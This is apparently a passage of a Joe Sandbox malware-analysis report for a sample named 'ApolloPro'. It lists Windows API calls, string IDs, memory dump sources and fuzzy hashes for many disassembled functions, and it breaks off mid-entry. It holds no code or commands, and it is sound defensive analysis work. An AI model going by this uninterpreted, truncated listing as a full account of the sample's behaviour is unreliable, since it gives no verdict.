                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                                                              • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                                              • API String ID: 4237274167-1221869570
                                                                                              • Opcode ID: 3b089261656444d9861bd46d5bba504d28ad03dabaa81a5ba9756ce07c06243e
                                                                                              • Instruction ID: 35107e92c72b6aa473c839f2a769cef5e51921fc824acc655c88312182a51cb4
                                                                                              • Opcode Fuzzy Hash: 3b089261656444d9861bd46d5bba504d28ad03dabaa81a5ba9756ce07c06243e
                                                                                              • Instruction Fuzzy Hash: B6915C706043019FC750EF24C48495ABBE6EF9A354F14896EF88A8B3A1DB30ED45CF91
                                                                                              APIs
                                                                                                • Part of subcall function 0064436A: _wcscpy.LIBCMT ref: 0064438D
                                                                                              • _memset.LIBCMT ref: 0069332E
                                                                                              • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0069335D
                                                                                              • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00693410
                                                                                              • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 0069343E
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: ItemMenu$Info$Default_memset_wcscpy
                                                                                              • String ID: 0
                                                                                              • API String ID: 4152858687-4108050209
                                                                                              • Opcode ID: ace624e30ae836405ba0bf1c93c023dceebcc2608ab474d8b55d23f6b2e51a9b
                                                                                              • Instruction ID: 58ad5a49c9b81e2baf7868e00407873a5b8b07c315a14911122cbd759e4be82f
                                                                                              • Opcode Fuzzy Hash: ace624e30ae836405ba0bf1c93c023dceebcc2608ab474d8b55d23f6b2e51a9b
                                                                                              • Instruction Fuzzy Hash: 6B51E1312083219BDB269F28C845AABBBEEAF45B60F04092DF891D37D1DB30CE44C756
                                                                                              APIs
                                                                                              • _memset.LIBCMT ref: 00692F67
                                                                                              • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 00692F83
                                                                                              • DeleteMenu.USER32(?,00000007,00000000), ref: 00692FC9
                                                                                              • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,006F7890,00000000), ref: 00693012
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: Menu$Delete$InfoItem_memset
                                                                                              • String ID: 0
                                                                                              • API String ID: 1173514356-4108050209
                                                                                              • Opcode ID: 6231f30c345a0c70bc261c67672d4efa242c0bdefd46a1e21b8a70b143e48967
                                                                                              • Instruction ID: 121f644a033de87b91bb9ade58db19723467add298a96a5148874de2e5572766
                                                                                              • Opcode Fuzzy Hash: 6231f30c345a0c70bc261c67672d4efa242c0bdefd46a1e21b8a70b143e48967
                                                                                              • Instruction Fuzzy Hash: 3D41C331204352AFDB20DF24C894F6ABBEAAF85310F14461DF465973D1D770EA05CB56
                                                                                              APIs
                                                                                                • Part of subcall function 00641A36: _memmove.LIBCMT ref: 00641A77
                                                                                                • Part of subcall function 0068B79A: GetClassNameW.USER32(?,?,000000FF), ref: 0068B7BD
                                                                                              • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00689ACC
                                                                                              • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00689ADF
                                                                                              • SendMessageW.USER32(?,00000189,?,00000000), ref: 00689B0F
                                                                                                • Part of subcall function 00641821: _memmove.LIBCMT ref: 0064185B
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$_memmove$ClassName
                                                                                              • String ID: ComboBox$ListBox
                                                                                              • API String ID: 365058703-1403004172
                                                                                              • Opcode ID: 3f883a190f3ffbd7f95abdcbb8f701180ea4a73f824cd097cc94e69c005cd968
                                                                                              • Instruction ID: 5a5b75108794e3c770b063fe5c7f861834c24639294800f315fb084fc24470e7
                                                                                              • Opcode Fuzzy Hash: 3f883a190f3ffbd7f95abdcbb8f701180ea4a73f824cd097cc94e69c005cd968
                                                                                              • Instruction Fuzzy Hash: 8D21E171A01104AFDB54ABB0DC86DFFB7AADF46360F14421AF825A72D1DB384D4A9720
                                                                                              APIs
                                                                                              • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 006A1F18
                                                                                              • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 006A1F3E
                                                                                              • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 006A1F6E
                                                                                              • InternetCloseHandle.WININET(00000000), ref: 006A1FB5
                                                                                                • Part of subcall function 006A2B4F: GetLastError.KERNEL32(?,?,006A1EE3,00000000,00000000,00000001), ref: 006A2B64
                                                                                                • Part of subcall function 006A2B4F: SetEvent.KERNEL32(?,?,006A1EE3,00000000,00000000,00000001), ref: 006A2B79
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                                                              • String ID:
                                                                                              • API String ID: 3113390036-3916222277
                                                                                              • Opcode ID: 471bd20a465114ff1edaf6162aa9e3a838236ab1aa4bc7b158432740e168208c
                                                                                              • Instruction ID: d5cc5ddfcb9170fef63bd3ac47759623fb0e54000e240681ca6766e8feea8854
                                                                                              • Opcode Fuzzy Hash: 471bd20a465114ff1edaf6162aa9e3a838236ab1aa4bc7b158432740e168208c
                                                                                              • Instruction Fuzzy Hash: DA219FB5604208BFE711AF64CC95EBF77EFEB4AB84F10411AF405AA240DB249D059FB5
                                                                                              APIs
                                                                                                • Part of subcall function 00632111: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0063214F
                                                                                                • Part of subcall function 00632111: GetStockObject.GDI32(00000011), ref: 00632163
                                                                                                • Part of subcall function 00632111: SendMessageW.USER32(00000000,00000030,00000000), ref: 0063216D
                                                                                              • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 006B6A86
                                                                                              • LoadLibraryW.KERNEL32(?), ref: 006B6A8D
                                                                                              • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 006B6AA2
                                                                                              • DestroyWindow.USER32(?), ref: 006B6AAA
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                                                              • String ID: SysAnimate32
                                                                                              • API String ID: 4146253029-1011021900
                                                                                              • Opcode ID: ebdcad0bef41da65a41fb3454af960a239adaa42441ebf91d862303d0499ac45
                                                                                              • Instruction ID: be36d37d8216f21321882f7db528ee95e8f06f2e0c81923e88ef9618fc65f490
                                                                                              • Opcode Fuzzy Hash: ebdcad0bef41da65a41fb3454af960a239adaa42441ebf91d862303d0499ac45
                                                                                              • Instruction Fuzzy Hash: 4721AEB1200209AFEF108F64DC80EFB77AEEF59324F149619FA51A2290D375DC9197A0
                                                                                              APIs
                                                                                              • GetStdHandle.KERNEL32(0000000C), ref: 00697377
                                                                                              • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 006973AA
                                                                                              • GetStdHandle.KERNEL32(0000000C), ref: 006973BC
                                                                                              • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 006973F6
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: CreateHandle$FilePipe
                                                                                              • String ID: nul
                                                                                              • API String ID: 4209266947-2873401336
                                                                                              • Opcode ID: 3afe1c30f7eda20b4f8d5ca1ad0fdc2da99b4175a0bc6280ce0c76b18831a1a1
                                                                                              • Instruction ID: 24f13ff5732f9820bdc4f160fa850888029a0ca68d1809b391f8d2949b77c368
                                                                                              • Opcode Fuzzy Hash: 3afe1c30f7eda20b4f8d5ca1ad0fdc2da99b4175a0bc6280ce0c76b18831a1a1
                                                                                              • Instruction Fuzzy Hash: 61218E70518306EBDF209F69DC05EEA7BEAAF54720F204A29FCA0D76D0D7709951DB50
APIs
• GetStdHandle.KERNEL32(000000F6), ref: 00697444
• CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00697476
• GetStdHandle.KERNEL32(000000F6), ref: 00697487
• CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 006974C1
Strings
Similarity
• API ID: CreateHandle$FilePipe
• String ID: nul
• API String ID: 4209266947-2873401336
• Opcode ID: 2a6a07e7d96ca6b2edbd569381d79ed588d80569fd335ea014436d35f72bfa94
• Instruction ID: af33eb8b516ab305f40ff36a8df7f1914a528acd69de33ebeedfafc358a560dd
• Opcode Fuzzy Hash: 2a6a07e7d96ca6b2edbd569381d79ed588d80569fd335ea014436d35f72bfa94
• Instruction Fuzzy Hash: BD21C1316183069BDF209F689C44EAA7BEEAF55B30F200B19F9A0D77D1DB709941CB51
APIs
• SetErrorMode.KERNEL32(00000001), ref: 0069B297
• GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 0069B2EB
• __swprintf.LIBCMT ref: 0069B304
• SetErrorMode.KERNEL32(00000000,00000001,00000000,006C0980), ref: 0069B342
Strings
Similarity
• API ID: ErrorMode$InformationVolume__swprintf
• String ID: %lu
• API String ID: 3164766367-685833217
• Opcode ID: 31f9df2a8411eee17ca2ff09d037a3ab4209df9b604b18aec0958f90a2a28a2c
• Instruction ID: dd95f387846cc1970cbbea263dcf63882ca8979bbbfde126a7f1d62dd60f1857
• Opcode Fuzzy Hash: 31f9df2a8411eee17ca2ff09d037a3ab4209df9b604b18aec0958f90a2a28a2c
• Instruction Fuzzy Hash: 8C216031A00108AFCB50EFA5CC85EAEB7B9EF89704F144069F905DB252DB31EA45CB61
APIs
  • Part of subcall function 00641821: _memmove.LIBCMT ref: 0064185B
  • Part of subcall function 0068AA52: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 0068AA6F
  • Part of subcall function 0068AA52: GetWindowThreadProcessId.USER32(?,00000000), ref: 0068AA82
  • Part of subcall function 0068AA52: GetCurrentThreadId.KERNEL32 ref: 0068AA89
  • Part of subcall function 0068AA52: AttachThreadInput.USER32(00000000), ref: 0068AA90
• GetFocus.USER32 ref: 0068AC2A
  • Part of subcall function 0068AA9B: GetParent.USER32(?), ref: 0068AAA9
• GetClassNameW.USER32(?,?,00000100), ref: 0068AC73
• EnumChildWindows.USER32(?,0068ACEB), ref: 0068AC9B
• __swprintf.LIBCMT ref: 0068ACB5
Strings
Similarity
• API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf_memmove
• String ID: %s%d
• API String ID: 1941087503-1110647743
• Opcode ID: c55727291502266f621fe21f176a782b207ee141e9a40829a603c27857a6b32b
• Instruction ID: ca8f396c17512e8a0ce28f70641dede2f24fb91fdb24a20dcb9b6777ebb1d9bb
• Opcode Fuzzy Hash: c55727291502266f621fe21f176a782b207ee141e9a40829a603c27857a6b32b
• Instruction Fuzzy Hash: 7911E474200204ABEF51BFE0CD86FEA376EAB44700F00417AFE08AA142CB705945CB75
APIs
• CharUpperBuffW.USER32(?,?), ref: 00692318
Strings
Similarity
• API ID: BuffCharUpper
• String ID: APPEND$EXISTS$KEYS$REMOVE
• API String ID: 3964851224-769500911
• Opcode ID: 7ff127af76aab0ce7f883bfd05f4ab1916458183bafbd6422acd8a08638b4776
• Instruction ID: de0c602e60d293b775fff6c4504a72ab20688c5ea17bd2b963801bc54e375c4f
• Opcode Fuzzy Hash: 7ff127af76aab0ce7f883bfd05f4ab1916458183bafbd6422acd8a08638b4776
• Instruction Fuzzy Hash: A5115E30900219DFCF40EF94D9A14EEB7BAFF16344F108569D81467751EB369D0ACB50
APIs
• OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 006AF2F0
• GetProcessIoCounters.KERNEL32(00000000,?), ref: 006AF320
• GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 006AF453
• CloseHandle.KERNEL32(?), ref: 006AF4D4
Similarity
• API ID: Process$CloseCountersHandleInfoMemoryOpen
• String ID:
• API String ID: 2364364464-0
• Opcode ID: d43c6aaf4b0deed3e16f1c38561d46bd017eeae511ef670b29fdc6d8b982cf83
• Instruction ID: 4180413682cffadd1b0620cf1ac5df3a5b536e6ac7bc7ec16cafdf7bbba20bb4
• Opcode Fuzzy Hash: d43c6aaf4b0deed3e16f1c38561d46bd017eeae511ef670b29fdc6d8b982cf83
• Instruction Fuzzy Hash: AF818F716003009FD760EF68D846F2AF7E6AF48710F14892DF9999B392DB70AD008F96
APIs
  • Part of subcall function 00641A36: _memmove.LIBCMT ref: 00641A77
  • Part of subcall function 006B147A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,006B040D,?,?), ref: 006B1491
• RegConnectRegistryW.ADVAPI32(?,?,?), ref: 006B075D
• RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 006B079C
• RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 006B07E3
• RegCloseKey.ADVAPI32(?,?), ref: 006B080F
• RegCloseKey.ADVAPI32(00000000), ref: 006B081C
Similarity
• API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
• String ID:
• API String ID: 3440857362-0
• Opcode ID: 40824f5dfca8f42a01bd9def12668e9f6d89fecee36ad5aa23befcc956111ea5
• Instruction ID: 713eecbe91d3f9968e14bd7c93027341b08ca12e98b4060497c01897b6e3dd7d
• Opcode Fuzzy Hash: 40824f5dfca8f42a01bd9def12668e9f6d89fecee36ad5aa23befcc956111ea5
• Instruction Fuzzy Hash: 42517C71208204AFD744EF64C891FABBBEAFF85304F04492DF59587291DB30E945CB56
APIs
• GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 0069EC62
• GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 0069EC8B
• WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 0069ECCA
  • Part of subcall function 00634D37: __itow.LIBCMT ref: 00634D62
  • Part of subcall function 00634D37: __swprintf.LIBCMT ref: 00634DAC
• WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 0069ECEF
• WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 0069ECF7
Similarity
• API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
• String ID:
• API String ID: 1389676194-0
• Opcode ID: 36d820adee40e8fc8c664cfb17baf0fcbb1f7f643f45b8b411a4a927e66adbae
• Instruction ID: 7f7ba7efec2276d361843151a6ebf49224e20c0ff88bab149576f67ad24f6701
• Opcode Fuzzy Hash: 36d820adee40e8fc8c664cfb17baf0fcbb1f7f643f45b8b411a4a927e66adbae
• Instruction Fuzzy Hash: 1A512835A00105DFDB41EF64C985AAEBBF6EF09310F188099E849AB3A1CB35ED51DF94
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: d8db9d6e6ecf10fa8fde75790d2eabe36eab5ee61ae517b8c4508737c86e8269
• Instruction ID: 34b3cb0c613700b48cc7beee690b0c26db70a38826a503065bba9f676fdd0faf
• Opcode Fuzzy Hash: d8db9d6e6ecf10fa8fde75790d2eabe36eab5ee61ae517b8c4508737c86e8269
• Instruction Fuzzy Hash: 2141B3B9908214AFD720DFA8CC48FF9BBB7EB0A350F140175E916A72D1DA709D81DB51
APIs
• GetCursorPos.USER32(?), ref: 00632727
• ScreenToClient.USER32(006F77B0,?), ref: 00632744
• GetAsyncKeyState.USER32(00000001), ref: 00632769
• GetAsyncKeyState.USER32(00000002), ref: 00632777
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: AsyncState$ClientCursorScreen
                                                                                              • String ID:
                                                                                              • API String ID: 4210589936-0
                                                                                              • Opcode ID: 8a02f6a345cd53fe0b8af15fbf4eb3cb96c42458bea7d6756e4286c4ac59f9d4
                                                                                              • Instruction ID: 99e2d3e253ec17e091253e198e8880f98c332250b7e4b2416f6a970765c2dd2f
                                                                                              • Opcode Fuzzy Hash: 8a02f6a345cd53fe0b8af15fbf4eb3cb96c42458bea7d6756e4286c4ac59f9d4
                                                                                              • Instruction Fuzzy Hash: FB416C7550450AFBDF159F69C844AF9BB76FB05334F10832AF868A22A0CB31AD90DBD1
                                                                                              APIs
                                                                                              • GetWindowRect.USER32(?,?), ref: 006895E8
                                                                                              • PostMessageW.USER32(?,00000201,00000001), ref: 00689692
                                                                                              • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 0068969A
                                                                                              • PostMessageW.USER32(?,00000202,00000000), ref: 006896A8
                                                                                              • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 006896B0
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessagePostSleep$RectWindow
                                                                                              • String ID:
                                                                                              • API String ID: 3382505437-0
                                                                                              • Opcode ID: ba5d98e5d6ca34d0204e1bff9e92e7e3e476b218c392956187359fca1ae0398a
                                                                                              • Instruction ID: 9f5024355aa7a8945e0ef3418a7a91fc13a9d1c4c06e7c33a919e4f55d086f56
                                                                                              • Opcode Fuzzy Hash: ba5d98e5d6ca34d0204e1bff9e92e7e3e476b218c392956187359fca1ae0398a
                                                                                              • Instruction Fuzzy Hash: 8B31DC71900219EFEB14DFA8D94CAEE7BB6EB44315F144218F924AA2D0D3B09960CBA0
                                                                                              APIs
                                                                                              • IsWindowVisible.USER32(?), ref: 0068BD9D
                                                                                              • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 0068BDBA
                                                                                              • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 0068BDF2
                                                                                              • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 0068BE18
                                                                                              • _wcsstr.LIBCMT ref: 0068BE22
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                                                                              • String ID:
                                                                                              • API String ID: 3902887630-0
                                                                                              • Opcode ID: ac7f961fc1cd60ee7579456d5140b4b0322996bce1a13d8b0bd928814b49cc0b
                                                                                              • Instruction ID: accf9ed6efdf88c7ba29f012b81e72a3eac862fc709de33c41266b8865ce4bc1
                                                                                              • Opcode Fuzzy Hash: ac7f961fc1cd60ee7579456d5140b4b0322996bce1a13d8b0bd928814b49cc0b
                                                                                              • Instruction Fuzzy Hash: FD210432204204BEEB256F399C09EBB7B9EDF457A0F10512EFD09CA291EF61CC4193A0
                                                                                              APIs
                                                                                                • Part of subcall function 006329E2: GetWindowLongW.USER32(?,000000EB), ref: 006329F3
                                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 006BB804
                                                                                              • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 006BB829
                                                                                              • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 006BB841
                                                                                              • GetSystemMetrics.USER32(00000004), ref: 006BB86A
                                                                                              • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,006A155C,00000000), ref: 006BB888
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$Long$MetricsSystem
                                                                                              • String ID:
                                                                                              • API String ID: 2294984445-0
                                                                                              • Opcode ID: 45ee2fc9318216e4f2dc59e3dc8d54164472247f4419be4ac3475e9042e0bebe
                                                                                              • Instruction ID: 1a57430fa2f981980521a4b246b4c1cfd800538894a10ebfd5f0aaeff6bc8f60
                                                                                              • Opcode Fuzzy Hash: 45ee2fc9318216e4f2dc59e3dc8d54164472247f4419be4ac3475e9042e0bebe
                                                                                              • Instruction Fuzzy Hash: 2C2182B1A14215EFCB149F39CC04AEA37AAFB05324F106639F921D62E0D7B09850CB80
                                                                                              APIs
                                                                                              • IsWindow.USER32(00000000), ref: 006A6159
                                                                                              • GetForegroundWindow.USER32 ref: 006A6170
                                                                                              • GetDC.USER32(00000000), ref: 006A61AC
                                                                                              • GetPixel.GDI32(00000000,?,00000003), ref: 006A61B8
                                                                                              • ReleaseDC.USER32(00000000,00000003), ref: 006A61F3
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$ForegroundPixelRelease
                                                                                              • String ID:
                                                                                              • API String ID: 4156661090-0
                                                                                              • Opcode ID: f57b063f9b7e48f546153bd196e8ff098bc101f3a9a23d608aa6cd2dc46fb687
                                                                                              • Instruction ID: b79f43fbe347e9e33d0cc31d1196c599164cebf9d54bd1b5c3690779b3dc6b91
